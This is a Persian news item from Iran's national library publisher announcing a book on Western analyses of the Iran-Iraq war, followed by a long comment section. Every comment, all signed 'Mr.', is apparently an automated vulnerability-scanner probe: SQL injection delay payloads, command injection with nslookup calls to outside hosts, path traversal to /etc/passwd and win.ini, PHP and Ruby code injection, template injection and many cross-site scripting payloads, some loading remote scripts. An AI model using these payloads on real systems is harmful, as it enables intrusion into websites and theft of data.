تازه های نشر

1399/06/24 دوشنبه

انتشارات سازمان اسناد و کتابخانه ملّی جمهوری اسلامی ایران، کتاب «جنگ ایران و عراق به روایت تحلیل‌گران غربی: نگاهی به جریان‌شناسی آثار تحلیل‌گران جنگ ایران و عراق در غرب بر اساس کتاب‌های انگلیسی زبان» از سلسله کتاب‌های «ایران‌شناسی» را در 332 صفحه چاپ و روانه بازار نشر کرد. تألیف این اثر را «دکتر محبوبه شمشیرگرها» به عهده داشته است. با انتشار این اثر تعداد منشورات سازمان به 1555 جلد رسید.

این کتاب مراحل مختلف تاریخ‌نگاری و مطالعاتی را که به زبان انگلیسی در قالب کتاب در مورد جنگ ایران و عراق منتشر شده و همچنین معرفی نویسندگان این آثار و مراکز آموزشی و پژوهشی پدیدآورنده این آثار را بررسی کرده است. کتاب در سه بخش تنظیم شده است: در بخش اول، کلیاتی از جریان تاریخ‌نگاری جنگ ایران و عراق در غرب شامل اهداف، ابعاد، رویکردها، موضوعات، مشکلات و کاستی‌ها، روش‌ها و منابع و مآخذ اطلاعاتی نویسندگان آمده است؛ در بخش دوم که قسمت عمده این اثر را تشکیل می‌دهد، پژوهش‌های غربیان در پیوند با رخدادها و تحولات بزرگ منطقه‌ای، را در پنج دوره: 1) از هجوم عراق تا اشغال بخشی از خاک ایران، 2) از بازپس‌گیری مناطق اشغالی ایران و ادامه جنگ طاقت‌فرسا تا اوج‌گیری صف‌آرایی بین‌المللی علیه ایران در جنگ تمام عیار و پایان جنگ، 3) از پایان جنگ تا حمله عراق به کویت، 4) از حمله عراق به کویت و پیامدهای آن تا سقوط صدام، 5) پس از حمله آمریکا به عراق و سقوط رژیم بعث در این کشور؛ در بخش سوم برجسته‌ترین تحلیل‌گران جنگ ایران و عراق در غرب معرفی شده است.

علاقه‌مندان جهت تهیه این اثر می‌توانند از طریق مراجعه به فروشگاه انتشارات سازمان واقع در ساختمان کتابخانه ملی ایران، فروشگاه مجازی سازمان به آدرس http://bookshop.nlai.ir اقدام نمایند و یا با شمارة تلفن 81623277 تماس بگیرند.

ثبت نظر
نظرات
05/08/1400 01:41 ب.ظ
Mr.

cHivWT8F

05/08/1400 01:41 ب.ظ
Mr.

1*

05/08/1400 01:41 ب.ظ
Mr.

1*

05/08/1400 01:41 ب.ظ
Mr.

1*

05/08/1400 01:42 ب.ظ
Mr.

1*

05/08/1400 01:42 ب.ظ
Mr.

-1 OR 2+98-98-1=0+0+0+1

05/08/1400 01:42 ب.ظ
Mr.

-1 OR 3+98-98-1=0+0+0+1

05/08/1400 01:42 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 01:42 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 01:42 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 01:42 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 01:53 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 01:53 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 01:53 ب.ظ
Mr.

1'"

05/08/1400 01:53 ب.ظ
Mr.

1����%2527%2522

05/08/1400 01:53 ب.ظ
Mr.

@@Kxm6h

05/08/1400 01:55 ب.ظ
Mr.

response.write(9832638*9414187)

05/08/1400 01:55 ب.ظ
Mr.

'+response.write(9832638*9414187)+'

05/08/1400 01:55 ب.ظ
Mr.

"+response.write(9832638*9414187)+"

05/08/1400 01:55 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 01:55 ب.ظ
Mr.

echo bhytzc$()\ lplzzj\nz^xyu||a #' &echo bhytzc$()\ lplzzj\nz^xyu||a #|" &echo bhytzc$()\ lplzzj\nz^xyu||a #

05/08/1400 01:55 ب.ظ
Mr.

&echo wjngup$()\ oenatg\nz^xyu||a #' &echo wjngup$()\ oenatg\nz^xyu||a #|" &echo wjngup$()\ oenatg\nz^xyu||a #

05/08/1400 01:55 ب.ظ
Mr.

|echo phsudg$()\ vvmcsm\nz^xyu||a #' |echo phsudg$()\ vvmcsm\nz^xyu||a #|" |echo phsudg$()\ vvmcsm\nz^xyu||a #

05/08/1400 01:55 ب.ظ
Mr.

(nslookup hitpbuurqkttwd1249.bxss.me||perl -e "gethostbyname('hitpbuurqkttwd1249.bxss.me')")

05/08/1400 01:55 ب.ظ
Mr.

$(nslookup hitrtftayfcjlf96d4.bxss.me||perl -e "gethostbyname('hitrtftayfcjlf96d4.bxss.me')")

05/08/1400 01:55 ب.ظ
Mr.

&(nslookup hitkhgoxnqvzub5a2e.bxss.me||perl -e "gethostbyname('hitkhgoxnqvzub5a2e.bxss.me')")&'\"`0&(nslookup hitkhgoxnqvzub5a2e.bxss.me||perl -e "gethostbyname('hitkhgoxnqvzub5a2e.bxss.me')")&`'

05/08/1400 01:55 ب.ظ
Mr.

|(nslookup hitkylqkongly7708a.bxss.me||perl -e "gethostbyname('hitkylqkongly7708a.bxss.me')")

05/08/1400 01:55 ب.ظ
Mr.

`(nslookup hitwijlnrrrlc7a11b.bxss.me||perl -e "gethostbyname('hitwijlnrrrlc7a11b.bxss.me')")`

05/08/1400 01:55 ب.ظ
Mr.

;(nslookup hitchnbvttpxi2ae4b.bxss.me||perl -e "gethostbyname('hitchnbvttpxi2ae4b.bxss.me')")|(nslookup hitchnbvttpxi2ae4b.bxss.me||perl -e "gethostbyname('hitchnbvttpxi2ae4b.bxss.me')")&(nslookup hitchnbvttpxi2ae4b.bxss.me||perl -e "gethostbyname('hitchnbvttpxi2ae4b.bxss.me')")

05/08/1400 01:56 ب.ظ
Mr.

TN7WRDeC

05/08/1400 01:56 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 01:56 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 01:56 ب.ظ
Mr.

../

05/08/1400 01:56 ب.ظ
Mr.

./

05/08/1400 01:56 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 01:56 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 01:56 ب.ظ
Mr.

${9999576+10000079}

05/08/1400 02:36 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 02:36 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 02:36 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 02:36 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 02:36 ب.ظ
Mr.

bxss.me

05/08/1400 02:36 ب.ظ
Mr.

&n938068=v905795

05/08/1400 02:36 ب.ظ
Mr.

)

05/08/1400 02:36 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 02:36 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 02:36 ب.ظ
Mr.

'"()

05/08/1400 02:36 ب.ظ
Mr.

'.gethostbyname(lc('hitdq'.'vtvtnktq4ff07.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(79).chr(118).chr(78).'

05/08/1400 02:36 ب.ظ
Mr.

".gethostbyname(lc("hitqi"."ztvfbuekaae34.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(74).chr(102).chr(88)."

05/08/1400 02:36 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 02:36 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 02:36 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 02:36 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 02:36 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 02:36 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 02:37 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 02:37 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 02:37 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 02:37 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(115).concat(78).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitjz"+"dlevblqm09aaa.bxss.me.")[3].to_s)+"

05/08/1400 02:37 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(111).concat(87).concat(111).concat(88)+(require'socket'
Socket.gethostbyname('hitmh'+'gwvejthqa40da.bxss.me.')[3].to_s)+'

05/08/1400 02:37 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 02:37 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 02:37 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7/.

05/08/1400 02:37 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 02:37 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 02:37 ب.ظ
Mr.

'"()&%<acx><ScRiPt >X1PX(9515)</ScRiPt>

05/08/1400 02:37 ب.ظ
Mr.

'"

05/08/1400 02:37 ب.ظ
Mr.

<!--

05/08/1400 02:37 ب.ظ
Mr.

'"()&%<acx><ScRiPt >X1PX(9239)</ScRiPt>

05/08/1400 02:37 ب.ظ
Mr.

9421991

05/08/1400 02:37 ب.ظ
Mr.

acu1553<s1﹥s2ʺs3ʹuca1553

05/08/1400 02:37 ب.ظ
Mr.

acux3173��z1��z2a�bcxuca3173

05/08/1400 02:37 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 02:37 ب.ظ
Mr.

1pHL42hIzO

05/08/1400 02:37 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 02:37 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 02:37 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 02:37 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 02:37 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 02:37 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 02:37 ب.ظ
Mr.

<ScRiPt >X1PX(9049)</ScRiPt>

05/08/1400 02:37 ب.ظ
Mr.

<W1Y4IF>NA4V7[!+!]</W1Y4IF>

05/08/1400 02:37 ب.ظ
Mr.

<script>X1PX(9969)</script>

05/08/1400 02:37 ب.ظ
Mr.

<ScR<ScRiPt>IpT>X1PX(9017)</sCr<ScRiPt>IpT>

05/08/1400 02:38 ب.ظ
Mr.

<ScRiPt
>X1PX(9280)</ScRiPt>

05/08/1400 02:38 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9952></ScRiPt>

05/08/1400 02:38 ب.ظ
Mr.

<ScRiPt
>X1PX(9647)</ScRiPt>

05/08/1400 02:38 ب.ظ
Mr.

<svg  

�onload=X1PX(9794);>

05/08/1400 02:38 ب.ظ
Mr.

<isindex type=image src=1 onerror=X1PX(9686)>

05/08/1400 02:38 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9989'>

05/08/1400 02:38 ب.ظ
Mr.

<body onload=X1PX(9102)>

05/08/1400 02:38 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=X1PX(9442)>

05/08/1400 02:38 ب.ظ
Mr.

<img src=xyz OnErRor=X1PX(9081)>

05/08/1400 02:38 ب.ظ
Mr.

<img/src=">" onerror=alert(9349)>

05/08/1400 02:38 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%58%31%50%58%289072%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 02:38 ب.ظ
Mr.

\u003CScRiPt\X1PX(9341)\u003C/sCripT\u003E

05/08/1400 02:38 ب.ظ
Mr.

&lt;ScRiPt&gt;X1PX(9944)&lt;/sCripT&gt;

05/08/1400 02:38 ب.ظ
Mr.

�<img acu onmouseover=X1PX(91621) //�>

05/08/1400 02:38 ب.ظ
Mr.

<input autofocus onfocus=X1PX(9373)>

05/08/1400 02:38 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 02:38 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 02:38 ب.ظ
Mr.

}body{acu:Expre/**/SSion(X1PX(9358))}

05/08/1400 02:38 ب.ظ
Mr.

<% contenteditable onresize=X1PX(9980)>

05/08/1400 02:38 ب.ظ
Mr.

ifGJK
<ScRiPt >X1PX(9899)</ScRiPt>

05/08/1400 02:38 ب.ظ
Mr.

<WRPDMN>BZ7BE[!+!]</WRPDMN>

05/08/1400 02:39 ب.ظ
Mr.

<ifRAme sRc=9469.com></IfRamE>

05/08/1400 02:39 ب.ظ
Mr.

<nGpeLz x=9716>

05/08/1400 02:39 ب.ظ
Mr.

<img sRc='http://attacker-9663/log.php?

05/08/1400 02:39 ب.ظ
Mr.

<npDQyV<

05/08/1400 02:42 ب.ظ
Mr.

qX11ANEy

05/08/1400 02:42 ب.ظ
Mr.

1*

05/08/1400 02:42 ب.ظ
Mr.

1*

05/08/1400 02:42 ب.ظ
Mr.

1*

05/08/1400 02:42 ب.ظ
Mr.

1*

05/08/1400 02:42 ب.ظ
Mr.

-1 OR 2+582-582-1=0+0+0+1

05/08/1400 02:42 ب.ظ
Mr.

-1 OR 3+582-582-1=0+0+0+1

05/08/1400 02:42 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 02:42 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 02:42 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 02:42 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 02:42 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

1egvE3yy'; waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

UZXGZBqx'); waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

8UFHBiwa')); waitfor delay '0:0:15' --

05/08/1400 02:42 ب.ظ
Mr.

-5 OR 608=(SELECT 608 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

-5) OR 157=(SELECT 157 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

-1)) OR 444=(SELECT 444 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

LoAjZZqp' OR 101=(SELECT 101 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

Gx4QPBBB') OR 129=(SELECT 129 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

AOBgS3vt')) OR 887=(SELECT 887 FROM PG_SLEEP(15))--

05/08/1400 02:42 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 02:42 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 02:42 ب.ظ
Mr.

response.write(9315526*9788023)

05/08/1400 02:42 ب.ظ
Mr.

1'"

05/08/1400 02:42 ب.ظ
Mr.

1����%2527%2522

05/08/1400 02:42 ب.ظ
Mr.

@@9fcxJ

05/08/1400 02:42 ب.ظ
Mr.

'+response.write(9315526*9788023)+'

05/08/1400 02:42 ب.ظ
Mr.

"+response.write(9315526*9788023)+"

05/08/1400 02:42 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 02:42 ب.ظ
Mr.

echo vdnxmc$()\ iizslc\nz^xyu||a #' &echo vdnxmc$()\ iizslc\nz^xyu||a #|" &echo vdnxmc$()\ iizslc\nz^xyu||a #

05/08/1400 02:42 ب.ظ
Mr.

&echo qiyhrx$()\ xaqxqn\nz^xyu||a #' &echo qiyhrx$()\ xaqxqn\nz^xyu||a #|" &echo qiyhrx$()\ xaqxqn\nz^xyu||a #

05/08/1400 02:42 ب.ظ
Mr.

|echo kzldyv$()\ wjryeg\nz^xyu||a #' |echo kzldyv$()\ wjryeg\nz^xyu||a #|" |echo kzldyv$()\ wjryeg\nz^xyu||a #

05/08/1400 02:42 ب.ظ
Mr.

(nslookup hitxznlwyilur9ec6e.bxss.me||perl -e "gethostbyname('hitxznlwyilur9ec6e.bxss.me')")

05/08/1400 02:42 ب.ظ
Mr.

$(nslookup hitbxxwhmpizgd65a6.bxss.me||perl -e "gethostbyname('hitbxxwhmpizgd65a6.bxss.me')")

05/08/1400 02:42 ب.ظ
Mr.

&(nslookup hiteussldnvmubd2e3.bxss.me||perl -e "gethostbyname('hiteussldnvmubd2e3.bxss.me')")&'\"`0&(nslookup hiteussldnvmubd2e3.bxss.me||perl -e "gethostbyname('hiteussldnvmubd2e3.bxss.me')")&`'

05/08/1400 02:42 ب.ظ
Mr.

|(nslookup hitgqddlpijufec6cd.bxss.me||perl -e "gethostbyname('hitgqddlpijufec6cd.bxss.me')")

05/08/1400 02:42 ب.ظ
Mr.

`(nslookup hitehmpfuktayc9d04.bxss.me||perl -e "gethostbyname('hitehmpfuktayc9d04.bxss.me')")`

05/08/1400 02:42 ب.ظ
Mr.

;(nslookup hitmlfscagyyt8cd66.bxss.me||perl -e "gethostbyname('hitmlfscagyyt8cd66.bxss.me')")|(nslookup hitmlfscagyyt8cd66.bxss.me||perl -e "gethostbyname('hitmlfscagyyt8cd66.bxss.me')")&(nslookup hitmlfscagyyt8cd66.bxss.me||perl -e "gethostbyname('hitmlfscagyyt8cd66.bxss.me')")

05/08/1400 02:43 ب.ظ
Mr.

IUNhhLHf

05/08/1400 02:43 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 02:43 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 02:43 ب.ظ
Mr.

../

05/08/1400 02:43 ب.ظ
Mr.

./

05/08/1400 02:43 ب.ظ
Mr.

12345'"\'\");|]*{
<>�''💡

05/08/1400 02:43 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 02:43 ب.ظ
Mr.

${10000014+9999977}

05/08/1400 02:43 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 02:43 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 02:43 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 02:43 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 02:43 ب.ظ
Mr.

bxss.me

05/08/1400 02:43 ب.ظ
Mr.

&n982150=v955541

05/08/1400 02:43 ب.ظ
Mr.

)

05/08/1400 02:43 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 02:43 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 02:44 ب.ظ
Mr.

'"()

05/08/1400 02:44 ب.ظ
Mr.

'.gethostbyname(lc('hitxm'.'jdzbatefa68f3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(68).chr(102).chr(88).'

05/08/1400 02:44 ب.ظ
Mr.

".gethostbyname(lc("hityf"."ztgyaxuac5194.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(72).chr(120).chr(75)."

05/08/1400 02:44 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 02:44 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 02:44 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 02:44 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 02:44 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 02:44 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 02:44 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 02:44 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 02:44 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 02:44 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(114).concat(83).concat(102).concat(74)+(require"socket"
Socket.gethostbyname("hitya"+"sycaucxp0c712.bxss.me.")[3].to_s)+"

05/08/1400 02:44 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(110).concat(87).concat(101).concat(85)+(require'socket'
Socket.gethostbyname('hittf'+'cphqunwxf2b59.bxss.me.')[3].to_s)+'

05/08/1400 02:44 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 02:44 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 02:44 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7/.

05/08/1400 02:44 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 02:44 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 02:44 ب.ظ
Mr.

'"

05/08/1400 02:44 ب.ظ
Mr.

<!--

05/08/1400 02:44 ب.ظ
Mr.

'"()&%<acx><ScRiPt >VIbG(9783)</ScRiPt>

05/08/1400 02:44 ب.ظ
Mr.

'"()&%<acx><ScRiPt >H6wt(9656)</ScRiPt>

05/08/1400 02:44 ب.ظ
Mr.

'"()&%<acx><ScRiPt >VIbG(9009)</ScRiPt>

05/08/1400 02:44 ب.ظ
Mr.

9630692

05/08/1400 02:45 ب.ظ
Mr.

acu1331<s1﹥s2ʺs3ʹuca1331

05/08/1400 02:45 ب.ظ
Mr.

'"()&%<acx><ScRiPt >H6wt(9324)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

9847821

05/08/1400 02:45 ب.ظ
Mr.

acux3344��z1��z2a�bcxuca3344

05/08/1400 02:45 ب.ظ
Mr.

acu6062<s1﹥s2ʺs3ʹuca6062

05/08/1400 02:45 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 02:45 ب.ظ
Mr.

acux8447��z1��z2a�bcxuca8447

05/08/1400 02:45 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 02:45 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 02:45 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 02:45 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 02:45 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 02:45 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 02:45 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 02:45 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 02:45 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 02:45 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 02:45 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt >VIbG(9150)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<WLGQHR>ALBU2[!+!]</WLGQHR>

05/08/1400 02:45 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 02:45 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 02:45 ب.ظ
Mr.

<script>VIbG(9543)</script>

05/08/1400 02:45 ب.ظ
Mr.

<ScR<ScRiPt>IpT>VIbG(9667)</sCr<ScRiPt>IpT>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt >H6wt(9031)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt
>VIbG(9111)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<WHLVYJ>0GA84[!+!]</WHLVYJ>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9250></ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<script>H6wt(9276)</script>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt
>VIbG(9924)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<svg  

�onload=VIbG(9490);>

05/08/1400 02:45 ب.ظ
Mr.

<ScR<ScRiPt>IpT>H6wt(9171)</sCr<ScRiPt>IpT>

05/08/1400 02:45 ب.ظ
Mr.

<isindex type=image src=1 onerror=VIbG(9122)>

05/08/1400 02:45 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9440'>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt
>H6wt(9702)</ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<body onload=VIbG(9767)>

05/08/1400 02:45 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9908></ScRiPt>

05/08/1400 02:45 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=VIbG(9952)>

05/08/1400 02:46 ب.ظ
Mr.

<img src=xyz OnErRor=VIbG(9363)>

05/08/1400 02:46 ب.ظ
Mr.

<ScRiPt
>H6wt(9818)</ScRiPt>

05/08/1400 02:46 ب.ظ
Mr.

<img/src=">" onerror=alert(9641)>

05/08/1400 02:46 ب.ظ
Mr.

%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%56%49%62%47%289674%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 02:46 ب.ظ
Mr.

\u003CScRiPt\VIbG(9957)\u003C/sCripT\u003E

05/08/1400 02:46 ب.ظ
Mr.

<svg  

�onload=H6wt(9214);>

05/08/1400 02:46 ب.ظ
Mr.

&lt;ScRiPt&gt;VIbG(9773)&lt;/sCripT&gt;

05/08/1400 02:46 ب.ظ
Mr.

�<img acu onmouseover=VIbG(93221) //�>

05/08/1400 02:46 ب.ظ
Mr.

<isindex type=image src=1 onerror=H6wt(9778)>

05/08/1400 02:46 ب.ظ
Mr.

<input autofocus onfocus=VIbG(9091)>

05/08/1400 02:46 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 02:46 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9981'>

05/08/1400 02:46 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 02:46 ب.ظ
Mr.

}body{acu:Expre/**/SSion(VIbG(9045))}

05/08/1400 02:46 ب.ظ
Mr.

<body onload=H6wt(9951)>

05/08/1400 02:46 ب.ظ
Mr.

<% contenteditable onresize=VIbG(9559)>

05/08/1400 02:46 ب.ظ
Mr.

bzu3S
<ScRiPt >VIbG(9251)</ScRiPt>

05/08/1400 02:46 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=H6wt(9653)>

05/08/1400 02:46 ب.ظ
Mr.

<WZLUJ8>83MNJ[!+!]</WZLUJ8>

05/08/1400 02:46 ب.ظ
Mr.

<ifRAme sRc=9792.com></IfRamE>

05/08/1400 02:46 ب.ظ
Mr.

<img src=xyz OnErRor=H6wt(9944)>

05/08/1400 02:46 ب.ظ
Mr.

<6XNKyW x=9081>

05/08/1400 02:46 ب.ظ
Mr.

<img sRc='http://attacker-9453/log.php?

05/08/1400 02:46 ب.ظ
Mr.

<img/src=">" onerror=alert(9374)>

05/08/1400 02:46 ب.ظ
Mr.

<baN5YT<

05/08/1400 02:46 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%48%36%77%74%289045%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 02:46 ب.ظ
Mr.

\u003CScRiPt\H6wt(9701)\u003C/sCripT\u003E

05/08/1400 02:46 ب.ظ
Mr.

&lt;ScRiPt&gt;H6wt(9526)&lt;/sCripT&gt;

05/08/1400 02:46 ب.ظ
Mr.

�<img acu onmouseover=H6wt(94511) //�>

05/08/1400 02:46 ب.ظ
Mr.

<input autofocus onfocus=H6wt(9997)>

05/08/1400 02:46 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 02:46 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 02:47 ب.ظ
Mr.

}body{acu:Expre/**/SSion(H6wt(9489))}

05/08/1400 02:47 ب.ظ
Mr.

